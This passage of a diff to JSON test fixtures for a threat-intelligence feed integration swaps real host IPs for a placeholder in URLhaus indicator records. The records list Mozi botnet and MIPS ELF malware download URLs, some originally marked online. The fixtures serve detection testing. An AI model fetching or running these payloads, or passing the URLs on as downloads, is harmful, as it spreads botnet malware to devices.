listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1396,18 +1396,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.229.55.75:38111/Mozi.m", + "original": "http://89.160.20.156:38111/Mozi.m", "scheme": "http", "port": 38111, - "domain": "45.229.55.75", - "full": "http://45.229.55.75:38111/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38111/Mozi.m" }, - "ip": "45.229.55.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692584010Z", - "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://45.229.55.75:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"45.229.55.75\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024642300Z", + "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://89.160.20.156:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1444,18 +1444,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.242.148:34556/Mozi.m", + "original": "http://89.160.20.156:34556/Mozi.m", "scheme": "http", "port": 34556, - "domain": "182.121.242.148", - "full": "http://182.121.242.148:34556/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34556/Mozi.m" }, - "ip": "182.121.242.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692588799Z", - "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://182.121.242.148:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.242.148\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024649400Z", + "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://89.160.20.156:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1493,18 +1493,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://106.115.189.249:59815/Mozi.m", + "original": "http://89.160.20.156:59815/Mozi.m", "scheme": "http", "port": 59815, - "domain": "106.115.189.249", - "full": "http://106.115.189.249:59815/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59815/Mozi.m" }, - "ip": "106.115.189.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692593087Z", - "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://106.115.189.249:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"106.115.189.249\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024656400Z", + "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://89.160.20.156:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1543,18 +1543,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://182.117.93.110:50587/bin.sh", + "original": "http://89.160.20.156:50587/bin.sh", "scheme": "http", "port": 50587, - "domain": "182.117.93.110", - "full": "http://182.117.93.110:50587/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50587/bin.sh" }, - "ip": "182.117.93.110" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692596974Z", - "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://182.117.93.110:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"182.117.93.110\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.024663400Z", + "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://89.160.20.156:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1592,18 +1592,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://110.251.5.169:48322/Mozi.m", + "original": "http://89.160.20.156:48322/Mozi.m", "scheme": "http", "port": 48322, - "domain": "110.251.5.169", - "full": "http://110.251.5.169:48322/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48322/Mozi.m" }, - "ip": "110.251.5.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692600400Z", - "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://110.251.5.169:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"110.251.5.169\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024670600Z", + "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://89.160.20.156:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1640,18 +1640,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.51.117.186:33317/Mozi.m", + "original": "http://89.160.20.156:33317/Mozi.m", "scheme": "http", "port": 33317, - "domain": "101.51.117.186", - "full": "http://101.51.117.186:33317/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33317/Mozi.m" }, - "ip": "101.51.117.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692603586Z", - "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://101.51.117.186:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"101.51.117.186\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024677800Z", + "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://89.160.20.156:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1688,18 +1688,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://121.151.78.166:41516/Mozi.m", + "original": "http://89.160.20.156:41516/Mozi.m", "scheme": "http", "port": 41516, - "domain": "121.151.78.166", - "full": "http://121.151.78.166:41516/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41516/Mozi.m" }, - "ip": "121.151.78.166" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692606983Z", - "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://121.151.78.166:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"121.151.78.166\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024685200Z", + "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://89.160.20.156:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1736,18 +1736,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.72.92.97:57798/Mozi.m", + "original": "http://89.160.20.156:57798/Mozi.m", "scheme": "http", "port": 57798, - "domain": "116.72.92.97", - "full": "http://116.72.92.97:57798/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57798/Mozi.m" }, - "ip": "116.72.92.97" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692610670Z", - "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://116.72.92.97:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.72.92.97\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024692200Z", + "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://89.160.20.156:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1784,18 +1784,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.218.15.209:47671/Mozi.m", + "original": "http://89.160.20.156:47671/Mozi.m", "scheme": "http", "port": 47671, - "domain": "27.218.15.209", - "full": "http://27.218.15.209:47671/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47671/Mozi.m" }, - "ip": "27.218.15.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692614006Z", - "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://27.218.15.209:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.218.15.209\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024699500Z", + "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://89.160.20.156:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1832,18 +1832,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.171.210:57690/Mozi.m", + "original": "http://89.160.20.156:57690/Mozi.m", "scheme": "http", "port": 57690, - "domain": "120.85.171.210", - "full": "http://120.85.171.210:57690/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57690/Mozi.m" }, - "ip": "120.85.171.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692617683Z", - "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://120.85.171.210:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.171.210\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024734400Z", + "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://89.160.20.156:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1881,18 +1881,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://117.251.59.53:50611/i", + "original": "http://89.160.20.156:50611/i", "scheme": "http", "port": 50611, - "domain": "117.251.59.53", - "full": "http://117.251.59.53:50611/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50611/i" }, - "ip": "117.251.59.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692620799Z", - "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://117.251.59.53:50611/i\",\"url_status\":\"online\",\"host\":\"117.251.59.53\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.024741400Z", + "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://89.160.20.156:50611/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1929,18 +1929,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.83.167:34141/Mozi.m", + "original": "http://89.160.20.156:34141/Mozi.m", "scheme": "http", "port": 34141, - "domain": "115.58.83.167", - "full": "http://115.58.83.167:34141/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34141/Mozi.m" }, - "ip": "115.58.83.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692624476Z", - "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://115.58.83.167:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.83.167\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024748300Z", + "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://89.160.20.156:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1978,18 +1978,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://94.178.124.83:44399/Mozi.m", + "original": "http://89.160.20.156:44399/Mozi.m", "scheme": "http", "port": 44399, - "domain": "94.178.124.83", - "full": "http://94.178.124.83:44399/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44399/Mozi.m" }, - "ip": "94.178.124.83" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692627702Z", - "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://94.178.124.83:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"94.178.124.83\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024755300Z", + "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://89.160.20.156:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2027,18 +2027,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.122.75.232:49120/Mozi.m", + "original": "http://89.160.20.156:49120/Mozi.m", "scheme": "http", "port": 49120, - "domain": "182.122.75.232", - "full": "http://182.122.75.232:49120/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49120/Mozi.m" }, - "ip": "182.122.75.232" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692630837Z", - "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://182.122.75.232:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.122.75.232\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024762100Z", + "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://89.160.20.156:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2076,18 +2076,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.202.43:51136/Mozi.m", + "original": "http://89.160.20.156:51136/Mozi.m", "scheme": "http", "port": 51136, - "domain": "115.63.202.43", - "full": "http://115.63.202.43:51136/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51136/Mozi.m" }, - "ip": "115.63.202.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692634244Z", - "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://115.63.202.43:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.202.43\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024769100Z", + "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://89.160.20.156:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2125,18 +2125,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.40.204:45773/Mozi.m", + "original": "http://89.160.20.156:45773/Mozi.m", "scheme": "http", "port": 45773, - "domain": "59.99.40.204", - "full": "http://59.99.40.204:45773/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45773/Mozi.m" }, - "ip": "59.99.40.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692637530Z", - "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://59.99.40.204:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.99.40.204\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024775800Z", + "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://89.160.20.156:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2174,18 +2174,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.128.213:56528/Mozi.m", + "original": "http://89.160.20.156:56528/Mozi.m", "scheme": "http", "port": 56528, - "domain": "117.247.128.213", - "full": "http://117.247.128.213:56528/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56528/Mozi.m" }, - "ip": "117.247.128.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692640696Z", - "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://117.247.128.213:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.247.128.213\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024782700Z", + "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://89.160.20.156:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2223,18 +2223,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://14.137.219.132:44427/Mozi.a", + "original": "http://89.160.20.156:44427/Mozi.a", "scheme": "http", "port": 44427, - "domain": "14.137.219.132", - "full": "http://14.137.219.132:44427/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44427/Mozi.a" }, - "ip": "14.137.219.132" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692643852Z", - "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://14.137.219.132:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"14.137.219.132\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024791400Z", + "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://89.160.20.156:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2272,18 +2272,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.40.14:36134/Mozi.m", + "original": "http://89.160.20.156:36134/Mozi.m", "scheme": "http", "port": 36134, - "domain": "42.224.40.14", - "full": "http://42.224.40.14:36134/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36134/Mozi.m" }, - "ip": "42.224.40.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692647008Z", - "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://42.224.40.14:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.40.14\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024798600Z", + "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://89.160.20.156:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 